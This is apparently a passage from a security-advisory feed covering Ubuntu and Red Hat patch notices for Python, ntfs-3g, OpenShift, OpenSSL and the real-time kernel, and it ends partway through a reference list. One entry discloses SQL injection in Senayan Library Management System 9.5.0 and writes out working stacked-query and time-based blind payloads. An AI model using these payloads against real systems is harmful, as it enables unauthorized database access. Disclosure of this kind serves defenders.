Ubuntu Security Notice 5713-1 - Devin Jeanpierre discovered that Python incorrectly handled sockets when the multiprocessing module was being used. A local attacker could possibly use this issue to execute arbitrary code and escalate privileges.

==========================================================================  
Ubuntu Security Notice USN-5713-1  
November 03, 2022

python3.10 vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.10  
- Ubuntu 22.04 LTS

Summary:

Python could be made to run programs if it received specially crafted  
socket connections.

Software Description:  
- python3.10: An interactive high-level object-oriented language

Details:

Devin Jeanpierre discovered that Python incorrectly handled sockets when  
the multiprocessing module was being used. A local attacker could possibly  
use this issue to execute arbitrary code and escalate privileges.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.10:  
   python3.10                      3.10.7-1ubuntu0.1  
   python3.10-minimal              3.10.7-1ubuntu0.1

Ubuntu 22.04 LTS:  
   python3.10                      3.10.6-1~22.04.1  
   python3.10-minimal              3.10.6-1~22.04.1

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-5713-1  
   CVE-2022-42919

Package Information:  
   https://launchpad.net/ubuntu/+source/python3.10/3.10.7-1ubuntu0.1  
   https://launchpad.net/ubuntu/+source/python3.10/3.10.6-1~22.04.1

Ubuntu Security Notice USN-5713-1

Ubuntu Security Notice 5711-2 - USN-5711-1 fixed a vulnerability in NTFS-3G. This update provides the corresponding update for Ubuntu 14.04 ESM Ubuntu 16.04 ESM. Yuchen Zeng and Eduardo Vela discovered that NTFS-3G incorrectly validated certain NTFS metadata. A local attacker could possibly use this issue to gain privileges.

=========================================================================  
Ubuntu Security Notice USN-5711-2  
November 03, 2022

ntfs-3g vulnerability  
=========================================================================  
A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 16.04 ESM  
- Ubuntu 14.04 ESM

Summary:

NTFS-3G could be made to crash or run programs as an administrator  
if it mounted a specially crafted disk.

Software Description:  
- ntfs-3g: read/write NTFS driver for FUSE

Details:

USN-5711-1 fixed a vulnerability in NTFS-3G. This update provides  
the corresponding update for Ubuntu 14.04 ESM Ubuntu 16.04 ESM.

Original advisory details:

 Yuchen Zeng and Eduardo Vela discovered that NTFS-3G incorrectly validated  
 certain NTFS metadata. A local attacker could possibly use this issue to  
 gain privileges.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 16.04 ESM:  
  ntfs-3g                         1:2015.3.14AR.1-1ubuntu0.3+esm4

Ubuntu 14.04 ESM:  
  ntfs-3g                         1:2013.1.13AR.1-2ubuntu2+esm4

In general, a standard system update will make all the necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-5711-2  
  https://ubuntu.com/security/notices/USN-5711-1  
  CVE-2022-40284

Ubuntu Security Notice USN-5711-2

WebKit suffers from an HTMLSelectElement use-after-free vulnerability.

WebKit HTMLSelectElement Use-After-Free

Senayan Library Management System version 9.5.0 suffers from a remote SQL injection vulnerability.

    ## Title: Senayan Library Management System v9.5.0 a.k.a SLIMS 9 BULIAN SQLi## Author: nu11secur1ty## Date: 11.03.2022## Vendor: https://slims.web.id/web/## Software: https://github.com/slims/slims9_bulian/releases## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.5.0## Description:The `keywords` parameter appears to be vulnerable to SQL injection attacks.A single quote was submitted in the keywords parameter, and a generalerror message was returned.Two single quotes were then submitted and the error messagedisappeared. The injection is confirmed manually from nu11secur1ty.The attacker can retrieve all information from the database of thissystem, by using this vulnerability.## STATUS: HIGH Vulnerability[+] Payload:```MySQL---Parameter: keywords (GET)    Type: stacked queries    Title: MySQL >= 5.0.12 stacked queries (comment)    Payload: csrf_token=a1266f4d54772e420f61cc03fe613b994f282c15271084e39c31f9267b55d50df06861&search=search&keywords=tfxgst7flvw5snn6r1b24fnyu8neev6w4v6u1uik7''')));SELECTSLEEP(5)#    Type: time-based blind    Title: MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP - comment)    Payload: csrf_token=a1266f4d54772e420f61cc03fe613b994f282c15271084e39c31f9267b55d50df06861&search=search&keywords=tfxgst7flvw5snn6r1b24fnyu8neev6w4v6u1uik7''')))RLIKE (SELECT 9971 FROM (SELECT(SLEEP(5)))bdiv)#---```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.5.0)## Proof and Exploit:[href](https://streamable.com/63og5v)## Time spent`3:00`

Senayan Library Management System 9.5.0 SQL Injection

Red Hat Security Advisory 2022-7216-01 - Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments. This advisory contains the container images for Red Hat OpenShift Container Platform 4.9.51. Issues addressed include code execution and memory leak vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: OpenShift Container Platform 4.9.51 bug fix and security update  
Advisory ID:       RHSA-2022:7216-01  
Product:           Red Hat OpenShift Enterprise  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:7216  
Issue date:        2022-11-03  
CVE Names:         CVE-2021-45485 CVE-2021-45486 CVE-2022-2588  
                   CVE-2022-21123 CVE-2022-21125 CVE-2022-21166  
                   CVE-2022-21618 CVE-2022-21619 CVE-2022-21624  
                   CVE-2022-21626 CVE-2022-21628 CVE-2022-26945  
                   CVE-2022-30321 CVE-2022-30322 CVE-2022-30323  
                   CVE-2022-39399  
====================================================================  
1. Summary:

Red Hat OpenShift Container Platform release 4.9.51 is now available with  
updates to packages and images that fix several bugs and add enhancements.

This release includes a security update for Red Hat OpenShift Container  
Platform 4.9.51

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Description:

Red Hat OpenShift Container Platform is Red Hat's cloud computing  
Kubernetes application platform solution designed for on-premise or private  
cloud deployments.

This advisory contains the container images for Red Hat OpenShift Container  
Platform 4.9.51. See the following advisory for the RPM packages for this  
release:

https://access.redhat.com/errata/RHBA-2022:7215

Space precludes documenting all of the container images in this advisory.  
See the following Release Notes documentation, which will be updated  
shortly for this release, for details about these changes:

https://docs.openshift.com/container-platform/4.9/release_notes/ocp-4-9-release-notes.html

Security Fix(es):

* go-getter: command injection vulnerability (CVE-2022-26945)  
* go-getter: unsafe download (issue 1 of 3) (CVE-2022-30321)  
* go-getter: unsafe download (issue 2 of 3) (CVE-2022-30322)  
* go-getter: unsafe download (issue 3 of 3) (CVE-2022-30323)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s)  
listed in the References section.

You may download the oc tool and use it to inspect release image metadata  
as follows:

(For x86_64 architecture)

$ oc adm release info  
quay.io/openshift-release-dev/ocp-release:4.9.51-x86_64

The image digest is  
sha256:ffbbbac3b3f719d993c0afd199c95efea7071817ddb1b744f817247efe4e7486

(For s390x architecture)

$ oc adm release info  
quay.io/openshift-release-dev/ocp-release:4.9.51-s390x

The image digest is  
sha256:5aed1dd6a7f96acd437bcc1c8d40ae23125dc07d2358ea354783d65d6008846d

(For ppc64le architecture)

$ oc adm release info  
quay.io/openshift-release-dev/ocp-release:4.9.51-ppc64le

The image digest is  
sha256:32bdc794a83bc6a81412b4f0908f5830e2a02e5c8730808c848328d0335fbc92

All OpenShift Container Platform 4.9 users are advised to upgrade to these  
updated packages and images when they are available in the appropriate  
release channel. To check for available updates, use the OpenShift Console  
or the CLI oc command. Instructions for upgrading a cluster are available  
at  
https://docs.openshift.com/container-platform/4.9/updating/updating-cluster-cli.html

3. Solution:

For OpenShift Container Platform 4.9 see the following documentation, which  
will be updated shortly for this release, for important instructions on how  
to upgrade your cluster and fully apply this asynchronous errata update:

https://docs.openshift.com/container-platform/4.9/release_notes/ocp-4-9-release-notes.html

Details on how to access this content are available at  
https://docs.openshift.com/container-platform/4.9/updating/updating-cluster-cli.html

4. Bugs fixed (https://bugzilla.redhat.com/):

2092918 - CVE-2022-30321 go-getter: unsafe download (issue 1 of 3)  
2092923 - CVE-2022-30322 go-getter: unsafe download (issue 2 of 3)  
2092925 - CVE-2022-30323 go-getter: unsafe download (issue 3 of 3)  
2092928 - CVE-2022-26945 go-getter: command injection vulnerability  
2095112 - [ovn] northd container termination script must use bash  
2096792 - machine-config-daemon-pull.service: use `cp` instead of `cat` when extracting MCD in OKD

5. JIRA issues fixed (https://issues.jboss.org/):

OCPBUGS-1469 - [4.9] Memory leak CRIO due to no garbage collection in /run/crio/exits for exited containers  
OCPBUGS-2101 - [4.11] .dockerignore interferes with OSBS2 builds  
OCPBUGS-2120 - [4.11] ETCD Operator goes degraded when a second internal node ip is added  
OCPBUGS-2143 - [4.9] Rebase openshift/etcd 4.9 onto 3.5.5  
OCPBUGS-2204 - Prefer local dns does not work expectedly on OCPv4.9  
OCPBUGS-2261 - Rotated logs should be collected by must-gather for 4.9 clusters  
OCPBUGS-2465 - [4.9] cri-o should report the stage of container and pod creation it's stuck at  
OCPBUGS-2576 - e2e tests: Installs Red Hat Integration - 3scale operator test is failing due to change of Operator name

6. References:

https://access.redhat.com/security/cve/CVE-2021-45485  
https://access.redhat.com/security/cve/CVE-2021-45486  
https://access.redhat.com/security/cve/CVE-2022-2588  
https://access.redhat.com/security/cve/CVE-2022-21123  
https://access.redhat.com/security/cve/CVE-2022-21125  
https://access.redhat.com/security/cve/CVE-2022-21166  
https://access.redhat.com/security/cve/CVE-2022-21618  
https://access.redhat.com/security/cve/CVE-2022-21619  
https://access.redhat.com/security/cve/CVE-2022-21624  
https://access.redhat.com/security/cve/CVE-2022-21626  
https://access.redhat.com/security/cve/CVE-2022-21628  
https://access.redhat.com/security/cve/CVE-2022-26945  
https://access.redhat.com/security/cve/CVE-2022-30321  
https://access.redhat.com/security/cve/CVE-2022-30322  
https://access.redhat.com/security/cve/CVE-2022-30323  
https://access.redhat.com/security/cve/CVE-2022-39399  
https://access.redhat.com/security/updates/classification/#important

7. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY2O6Q9zjgjWX9erEAQiciQ//Vk2JkvS6D+lA/20F5Pr9WMiihGRI12Tr  
j2YoX40nHqhQ0cZKKXRkRJOYqNy5L6u8Wx5cO4V6NeGnoEGQoa980IW/l/KJptG6  
OSAQXpLRk9ECHf4lH/kvJuf8mgcM+KBspT7MetkkW7shwKfPOyYOU0/Tp8zcp2W+  
xhiFmD+4bfBQPFdlLi2wxFcvbeUKuRrOdPH1pA3DBs8WQiakL9zVAtzZD0jzvuzf  
+TaUhcGDrSa/EAKdUpYGGuh6cUI2ECFTXj8uljrRUJgI3yKGrk7Z3H7zSo3Qmj5w  
jH6bRJwNt/1HXw2QJjUU2REuZSD4xdqd+lCkMb5iB+keiQnTleKxRCNDqI2EjcMw  
Glf6+fvq95keo3iO6v7rSmoZOOdrq4a+uRg3LyWkVPT/BWsmU17yKQa0dKEaDv2r  
ZssQTaxxmNFUZAAfpSORNvu9zrTWAsej1+UE+2S8KMEGpIVoHxba7TtcA+Eva2GT  
+VRTDB9OBDWewYkOJjk8RascgGvKLquZolQI6osg/8/8KoxzkuJmt/6tbwKUVmii  
8kadVJr1A3qPH6D3p3IXuHGpNxeCW9q0SzkwO1kBbm6zoMfcl4ErdUzYS+guSDaC  
yRxoH1ILoz7aifxpBRaOtbxkE/Fzh4Ql5aF4Nq2GiWjyuUCI+sen9fvuZLKgRXQv  
wEasM35nlZY=ITpR  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-7216-01

Red Hat Security Advisory 2022-7384-01 - The ubi9/openssl image provides provides an openssl command-line tool for using the various functions of the OpenSSL crypto library. Issues addressed include a buffer overflow vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Critical: openssl-container security update  
Advisory ID:       RHSA-2022:7384-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:7384  
Issue date:        2022-11-02  
CVE Names:         CVE-2022-3602 CVE-2022-3786  
====================================================================  
1. Summary:

An update for openssl-container is now available for Red Hat Enterprise  
Linux 9.

Red Hat Product Security has rated this update as having a security impact  
of Critical. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Description:

The ubi9/openssl image provides provides an openssl command-line tool for  
using the various functions of the OpenSSL crypto library. Using the  
OpenSSL tool, you can generate private keys, create certificate signing  
requests (CSRs), and display certificate information.

This updates the ubi9/openssl image in the Red Hat Container Registry.

To pull this container image, run one of the following commands:

    podman pull registry.redhat.io/rhel9/openssl (authenticated)  
    podman pull registry.access.redhat.com/ubi9/openssl (unauthenticated)

Security Fix(es):

* OpenSSL: X.509 Email Address Buffer Overflow (CVE-2022-3602)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

3. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

For the update to take effect, all services linked to the OpenSSL library  
must be restarted, or the system rebooted.

4. Bugs fixed (https://bugzilla.redhat.com/):

2134869 - rebuild of openssl-container 9.0  
2137723 - CVE-2022-3602 OpenSSL: X.509 Email Address Buffer Overflow

5. References:

https://access.redhat.com/security/cve/CVE-2022-3602  
https://access.redhat.com/security/cve/CVE-2022-3786  
https://access.redhat.com/security/updates/classification/#critical  
https://catalog.redhat.com/software/containers/search  
https://access.redhat.com/security/vulnerabilities/RHSB-2022-004

6. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY2MRgtzjgjWX9erEAQgHMBAAgjuU0cGu47ptVYHjuJHUUBIrQaAjqcwW  
MffMcu54pXHcKaFi0FV7moAJ5mawQWAamunMaleKScdinaYMk9W8RtLg8jO9flpm  
vN1tTVvIyoSQ9KKe/1jde37VbtkNL5FmV9uWfMCL55qqF4FL0a6zFLbPDjWXaxh9  
UvXds0G1JqUkHnSCrxIMP9UJrTvMQRxI06BfBkstMbfdUd26gfmcyTux9IyVZQnc  
YKnDaYKsMGmy+iX1Fe7FlfnAyA04MEVsqCa82MbD47TDRmFtrkurZO0R71MDGVVZ  
75AnDX+Z5o6Z7tZcmXWdz67aEZ4ApPVqvRjtd7D8LDGfJCDZC0HTS0cvUozJOqsL  
cl3owpI3Kj+bx8S+dtfjgRfMNXU4IRl4T+qSTBwE1jEY/s44NvJjGYDBGUqneUtF  
V7Hv7JkApSgx5OxLz2zK75DiGqL9fD/qpNHhj73KHWvvSKvNEGlmkIWWF1wkC5XO  
Z/Ld5Q/FW9bchkQwxEJuxykzukzn2m6xUqVKjfB4ErhCBfoqredYY7jcNLYJcgOU  
BNaR9kH1kRRp2F55QmA03dxU6FPn4N1CoOHJsrxvF4lIXkrgCzu9QTVPqOONSg+i  
dQJYzvrv9r7E0AT7iSOzlBj3VUZqL3NktNb+4fOY9RwgRMdkBBi0ofykujSXeI2S  
8OZlzBFtsPA=1WnU  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-7384-01

Red Hat Security Advisory 2022-7323-01 - Python is an interpreted, interactive, object-oriented programming language, which includes modules, classes, exceptions, very high level dynamic data types and dynamic typing. Python supports interfaces to many system calls and libraries, as well as to various windowing systems. Issues addressed include a denial of service vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Moderate: python3.9 security update  
Advisory ID:       RHSA-2022:7323-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:7323  
Issue date:        2022-11-02  
CVE Names:         CVE-2020-10735  
====================================================================  
1. Summary:

An update for python3.9 is now available for Red Hat Enterprise Linux 9.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat CodeReady Linux Builder (v. 9) - aarch64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux AppStream (v. 9) - aarch64, noarch, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux BaseOS (v. 9) - aarch64, ppc64le, s390x, x86_64

3. Description:

Python is an interpreted, interactive, object-oriented programming  
language, which includes modules, classes, exceptions, very high level  
dynamic data types and dynamic typing. Python supports interfaces to many  
system calls and libraries, as well as to various windowing systems.

Security Fix(es):

* python: int() type in PyLong_FromString() does not limit amount of digits  
converting text to int leading to DoS (CVE-2020-10735)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

1834423 - CVE-2020-10735 python: int() type in PyLong_FromString() does not limit amount of digits converting text to int leading to DoS

6. Package List:

Red Hat Enterprise Linux AppStream (v. 9):

aarch64:  
python3-devel-3.9.10-3.el9_0.aarch64.rpm  
python3-tkinter-3.9.10-3.el9_0.aarch64.rpm  
python3.9-debuginfo-3.9.10-3.el9_0.aarch64.rpm  
python3.9-debugsource-3.9.10-3.el9_0.aarch64.rpm

noarch:  
python-unversioned-command-3.9.10-3.el9_0.noarch.rpm

ppc64le:  
python3-devel-3.9.10-3.el9_0.ppc64le.rpm  
python3-tkinter-3.9.10-3.el9_0.ppc64le.rpm  
python3.9-debuginfo-3.9.10-3.el9_0.ppc64le.rpm  
python3.9-debugsource-3.9.10-3.el9_0.ppc64le.rpm

s390x:  
python3-devel-3.9.10-3.el9_0.s390x.rpm  
python3-tkinter-3.9.10-3.el9_0.s390x.rpm  
python3.9-debuginfo-3.9.10-3.el9_0.s390x.rpm  
python3.9-debugsource-3.9.10-3.el9_0.s390x.rpm

x86_64:  
python3-devel-3.9.10-3.el9_0.i686.rpm  
python3-devel-3.9.10-3.el9_0.x86_64.rpm  
python3-tkinter-3.9.10-3.el9_0.x86_64.rpm  
python3.9-debuginfo-3.9.10-3.el9_0.i686.rpm  
python3.9-debuginfo-3.9.10-3.el9_0.x86_64.rpm  
python3.9-debugsource-3.9.10-3.el9_0.i686.rpm  
python3.9-debugsource-3.9.10-3.el9_0.x86_64.rpm

Red Hat Enterprise Linux BaseOS (v. 9):

Source:  
python3.9-3.9.10-3.el9_0.src.rpm

aarch64:  
python3-3.9.10-3.el9_0.aarch64.rpm  
python3-libs-3.9.10-3.el9_0.aarch64.rpm  
python3.9-debuginfo-3.9.10-3.el9_0.aarch64.rpm  
python3.9-debugsource-3.9.10-3.el9_0.aarch64.rpm

ppc64le:  
python3-3.9.10-3.el9_0.ppc64le.rpm  
python3-libs-3.9.10-3.el9_0.ppc64le.rpm  
python3.9-debuginfo-3.9.10-3.el9_0.ppc64le.rpm  
python3.9-debugsource-3.9.10-3.el9_0.ppc64le.rpm

s390x:  
python3-3.9.10-3.el9_0.s390x.rpm  
python3-libs-3.9.10-3.el9_0.s390x.rpm  
python3.9-debuginfo-3.9.10-3.el9_0.s390x.rpm  
python3.9-debugsource-3.9.10-3.el9_0.s390x.rpm

x86_64:  
python3-3.9.10-3.el9_0.x86_64.rpm  
python3-libs-3.9.10-3.el9_0.i686.rpm  
python3-libs-3.9.10-3.el9_0.x86_64.rpm  
python3.9-debuginfo-3.9.10-3.el9_0.i686.rpm  
python3.9-debuginfo-3.9.10-3.el9_0.x86_64.rpm  
python3.9-debugsource-3.9.10-3.el9_0.i686.rpm  
python3.9-debugsource-3.9.10-3.el9_0.x86_64.rpm

Red Hat CodeReady Linux Builder (v. 9):

aarch64:  
python3-debug-3.9.10-3.el9_0.aarch64.rpm  
python3-idle-3.9.10-3.el9_0.aarch64.rpm  
python3-test-3.9.10-3.el9_0.aarch64.rpm  
python3.9-debuginfo-3.9.10-3.el9_0.aarch64.rpm  
python3.9-debugsource-3.9.10-3.el9_0.aarch64.rpm

ppc64le:  
python3-debug-3.9.10-3.el9_0.ppc64le.rpm  
python3-idle-3.9.10-3.el9_0.ppc64le.rpm  
python3-test-3.9.10-3.el9_0.ppc64le.rpm  
python3.9-debuginfo-3.9.10-3.el9_0.ppc64le.rpm  
python3.9-debugsource-3.9.10-3.el9_0.ppc64le.rpm

s390x:  
python3-debug-3.9.10-3.el9_0.s390x.rpm  
python3-idle-3.9.10-3.el9_0.s390x.rpm  
python3-test-3.9.10-3.el9_0.s390x.rpm  
python3.9-debuginfo-3.9.10-3.el9_0.s390x.rpm  
python3.9-debugsource-3.9.10-3.el9_0.s390x.rpm

x86_64:  
python3-3.9.10-3.el9_0.i686.rpm  
python3-debug-3.9.10-3.el9_0.i686.rpm  
python3-debug-3.9.10-3.el9_0.x86_64.rpm  
python3-idle-3.9.10-3.el9_0.i686.rpm  
python3-idle-3.9.10-3.el9_0.x86_64.rpm  
python3-test-3.9.10-3.el9_0.i686.rpm  
python3-test-3.9.10-3.el9_0.x86_64.rpm  
python3-tkinter-3.9.10-3.el9_0.i686.rpm  
python3.9-debuginfo-3.9.10-3.el9_0.i686.rpm  
python3.9-debuginfo-3.9.10-3.el9_0.x86_64.rpm  
python3.9-debugsource-3.9.10-3.el9_0.i686.rpm  
python3.9-debugsource-3.9.10-3.el9_0.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2020-10735  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY2K9P9zjgjWX9erEAQhGOg//ZDzZkxTKFT+w8YfRihGVqSIfaoEvvUoG  
Kuxw9qMBw23Hgb4VK+1ShLScwsuR+g2rJakWxbMdyXlejsVeLw/ACDzc1ICz0sam  
hVmVh1CW+Uinlxr+RH9uM8o/cb4ZUwYUSBNLQap4AG+zXXHfm3T9RKJIGn+NvFEE  
Ga76o3vy3MSdso+moycH37H1VzeX0IUgjvAjuGT9iixRf1MZz9JrZj/Q5vzvfYiD  
ctx5htLG8zX/wxqdO/vkTq0IT9m4ovqB13BWz12DV+00WYdUa+Vq44Hk1qvSSQSX  
cnZ+ALtOdkkd+utqAkyCmcHA7XPf8SLfqopKuVyTyPP/KVf24wrFyrkONuGgmyWQ  
dwBJK1LHWHdH4k1fhxG27S9njh+iI6vST9Eqe2DNDSd765f+Mdj0maxrOVLQaFMf  
TFdujJShx2q+D5XA/N0Xu0LxT/WPZk7NigZkm9h8XlBHae62d4KRps683TgaAeZL  
+6tA8rtL2QOuSu0gh4ho+nkhG2O4AdzUhnTnJxocsRBqFGptYh5CiiLZ8IXPpcdt  
h0PpljsAyktlZV0RpPe3H+nwXejJWRLqBA1aq13U3R9spEhgFq368k+/SG7RWIxi  
3AgEssHPB30cWiwwquA4ODz76byxMP/CEGZbpjhK8zRmJ+VGRN17UcpY7inqICsh  
8wYYE4UodTs=LoAh  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-7323-01

Red Hat Security Advisory 2022-7338-01 - The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements. Issues addressed include code execution, privilege escalation, and use-after-free vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: kernel-rt security and bug fix update  
Advisory ID:       RHSA-2022:7338-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:7338  
Issue date:        2022-11-02  
CVE Names:         CVE-2022-2588 CVE-2022-23816 CVE-2022-23825  
                   CVE-2022-26373 CVE-2022-29900 CVE-2022-29901  
====================================================================  
1. Summary:

An update for kernel-rt is now available for Red Hat Enterprise Linux 7.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux for Real Time (v. 7) - noarch, x86_64  
Red Hat Enterprise Linux for Real Time for NFV (v. 7) - noarch, x86_64

3. Description:

The kernel-rt packages provide the Real Time Linux Kernel, which enables  
fine-tuning for systems with extremely high determinism requirements.

Security Fix(es):

* A use-after-free in cls_route filter implementation may lead to privilege  
escalation (CVE-2022-2588)

* RetBleed Arbitrary Speculative Code Execution with Return Instructions  
(CVE-2022-23816, CVE-2022-29900)

* Branch Type Confusion (non-retbleed) (CVE-2022-23825)

* Intel: Post-barrier Return Stack Buffer Predictions (CVE-2022-26373)

* Intel: RetBleed Arbitrary Speculative Code Execution with Return  
Instructions (CVE-2022-29901)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

Bug Fix(es):

* Update to the latest RHEL7.9.z18 source tree (BZ#2117337)

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

The system must be rebooted for this update to take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2090226 - CVE-2022-23816 CVE-2022-29900 hw: cpu: AMD: RetBleed Arbitrary Speculative Code Execution with Return Instructions  
2103148 - CVE-2022-29901 hw: cpu: Intel: RetBleed Arbitrary Speculative Code Execution with Return Instructions  
2103153 - CVE-2022-23825 hw: cpu: AMD: Branch Type Confusion (non-retbleed)  
2114849 - CVE-2022-2588 kernel: a use-after-free in cls_route filter implementation may lead to privilege escalation  
2115065 - CVE-2022-26373 hw: cpu: Intel: Post-barrier Return Stack Buffer Predictions

6. Package List:

Red Hat Enterprise Linux for Real Time for NFV (v. 7):

Source:  
kernel-rt-3.10.0-1160.80.1.rt56.1225.el7.src.rpm

noarch:  
kernel-rt-doc-3.10.0-1160.80.1.rt56.1225.el7.noarch.rpm

x86_64:  
kernel-rt-3.10.0-1160.80.1.rt56.1225.el7.x86_64.rpm  
kernel-rt-debug-3.10.0-1160.80.1.rt56.1225.el7.x86_64.rpm  
kernel-rt-debug-debuginfo-3.10.0-1160.80.1.rt56.1225.el7.x86_64.rpm  
kernel-rt-debug-devel-3.10.0-1160.80.1.rt56.1225.el7.x86_64.rpm  
kernel-rt-debug-kvm-3.10.0-1160.80.1.rt56.1225.el7.x86_64.rpm  
kernel-rt-debug-kvm-debuginfo-3.10.0-1160.80.1.rt56.1225.el7.x86_64.rpm  
kernel-rt-debuginfo-3.10.0-1160.80.1.rt56.1225.el7.x86_64.rpm  
kernel-rt-debuginfo-common-x86_64-3.10.0-1160.80.1.rt56.1225.el7.x86_64.rpm  
kernel-rt-devel-3.10.0-1160.80.1.rt56.1225.el7.x86_64.rpm  
kernel-rt-kvm-3.10.0-1160.80.1.rt56.1225.el7.x86_64.rpm  
kernel-rt-kvm-debuginfo-3.10.0-1160.80.1.rt56.1225.el7.x86_64.rpm  
kernel-rt-trace-3.10.0-1160.80.1.rt56.1225.el7.x86_64.rpm  
kernel-rt-trace-debuginfo-3.10.0-1160.80.1.rt56.1225.el7.x86_64.rpm  
kernel-rt-trace-devel-3.10.0-1160.80.1.rt56.1225.el7.x86_64.rpm  
kernel-rt-trace-kvm-3.10.0-1160.80.1.rt56.1225.el7.x86_64.rpm  
kernel-rt-trace-kvm-debuginfo-3.10.0-1160.80.1.rt56.1225.el7.x86_64.rpm

Red Hat Enterprise Linux for Real Time (v. 7):

Source:  
kernel-rt-3.10.0-1160.80.1.rt56.1225.el7.src.rpm

noarch:  
kernel-rt-doc-3.10.0-1160.80.1.rt56.1225.el7.noarch.rpm

x86_64:  
kernel-rt-3.10.0-1160.80.1.rt56.1225.el7.x86_64.rpm  
kernel-rt-debug-3.10.0-1160.80.1.rt56.1225.el7.x86_64.rpm  
kernel-rt-debug-debuginfo-3.10.0-1160.80.1.rt56.1225.el7.x86_64.rpm  
kernel-rt-debug-devel-3.10.0-1160.80.1.rt56.1225.el7.x86_64.rpm  
kernel-rt-debuginfo-3.10.0-1160.80.1.rt56.1225.el7.x86_64.rpm  
kernel-rt-debuginfo-common-x86_64-3.10.0-1160.80.1.rt56.1225.el7.x86_64.rpm  
kernel-rt-devel-3.10.0-1160.80.1.rt56.1225.el7.x86_64.rpm  
kernel-rt-trace-3.10.0-1160.80.1.rt56.1225.el7.x86_64.rpm  
kernel-rt-trace-debuginfo-3.10.0-1160.80.1.rt56.1225.el7.x86_64.rpm  
kernel-rt-trace-devel-3.10.0-1160.80.1.rt56.1225.el7.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-2588  
https://access.redhat.com/security/cve/CVE-2022-23816  
https://access.redhat.com/security/cve/CVE-2022-23825  
https://access.redhat.com/security/cve/CVE-2022-26373  
https://access.redhat.com/security/cve/CVE-2022-29900  
